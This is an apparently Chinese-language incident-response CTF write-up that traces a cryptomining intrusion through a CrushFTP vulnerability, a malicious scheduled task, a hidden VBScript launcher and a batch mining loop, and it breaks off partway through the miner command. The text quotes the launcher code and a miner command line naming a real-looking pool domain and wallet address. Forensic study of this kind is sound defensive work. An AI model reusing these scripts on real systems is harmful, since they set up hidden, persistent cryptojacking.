solar应急响应月赛（5月）

1 攻击者使用什么漏洞获取了服务器的配置文件？ 题目描述：某某文化有限公司的运维小王刚刚搭建服务器发现cpu莫名的异常的升高请你帮助小王排查一下服务器，flag格式为：flag{CVE-2020-12345} 查看Administrator的桌面，存在CrushFTP 搜CrushFTP近期CVE漏洞 2 系统每天晚上系统都会卡卡的帮小明找到问题出在了那？ 题目描述：flag为配置名称（无空格） 可能的原因分析 计划任务（Task Scheduler） Windows 默认有一些维护任务（如 Defrag 碎片整理、 WindowsUpdate 自动更新）可能在夜间运行。 检查 taskschd.msc （任务计划程序）中的任务。 Windows Update 自动更新 WindowsUpdate 可能配置为夜间自动更新，占用大量资源。 磁盘碎片整理（Defrag） 默认情况下，Windows 会定期进行磁盘优化（ ScheduledDefrag ）。 防病毒扫描（Windows Defender 或第三方杀毒软件） 可能设置了夜间全盘扫描。 资源占用高的服务 如 Superfetch （SysMain）、 Windows Search 索引服务可能导致卡顿。 虚拟内存（Pagefile）配置问题 如果虚拟内存设置不合理，可能导致系统变卡。 根据以上思路，找到了恶意的计划任务，如下图 sql backing up就是导致每晚卡顿的原因 知识： C:\Windows\System32\Tasks 是 Windows 操作系统存储计划任务（Scheduled Tasks）的默认路径 。 也可以通过 任务计划程序（taskschd.msc） 管理所有任务 3 恶意域名是什么？ 题目描述：flag格式为：flag{xxx.xxxxxxxx.xxx} 查看计划任务调用的内容 这段代码是一个 XML 格式的操作指令，通常用于自动化任务或系统配置中。具体解释如下： 表示这是一个"作者上下文"的操作（可能是创建或设计阶段使用的操作） 执行命令的指令 "C:\Program Files\Microsoft SQL Server\90\Shared\sqlwsmprovhost.vbs" 指定要执行的命令是运行位于 SQL Server 2005(版本90)共享目录下的一个 VBScript 文件 找到该路径下的sqlwsmprovhost.vbs文件，并查看，如下图 这段 VBScript 代码的功能是创建一个 WScript.Shell 对象，并运行一个名为 sqlwscript.cmd 的批处理文件（隐藏窗口运行）。具体解释如下： //创建一个 WScript.Shell 对象，用于执行系统命令或运行程序 set ws = createobject("wscript.shell") //运行 "sqlwscript.cmd" 这个批处理文件，参数 `0` 表示隐藏窗口运行 ws.Run """sqlwscript.cmd""", 0 WScript.Shell 是 Windows 脚本宿主（WSH）提供的对象，用于执行系统命令、操作注册表、运行程序等。 这里主要用于运行外部程序（ .cmd 文件）。 ws.Run """sqlwscript.cmd""", 0 Run 方法用于执行指定的程序或命令。 """sqlwscript.cmd""" 的写法是因为 VBScript 需要用双引号包裹路径，而路径本身可能包含空格，所以用 "" 进行转义（相当于 "sqlwscript.cmd" ）。 0 表示运行时不显示窗口（隐藏运行）。 然后，打开sqlwscript.cmd查看如下： 这段批处理脚本 ( sqlwscript.cmd ) 是一个 无限循环执行的挖矿脚本 ，通常用于 加密货币挖矿（可能是恶意挖矿程序） 。以下是详细分析： @echo off 关闭命令回显，使脚本运行时不会显示执行的命令（隐蔽执行）。 cd /d "%~dp0" 切换到脚本所在的目录（ %~dp0 表示当前批处理文件的完整路径）。 确保脚本能正确访问同目录下的文件（如 sqlwpr.exe ）。 :start 定义一个标签 :start ，用于循环跳转。 sqlwpr.exe -a rx/0 --url b.oracleservice.top --user 46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ -t 0 sqlwp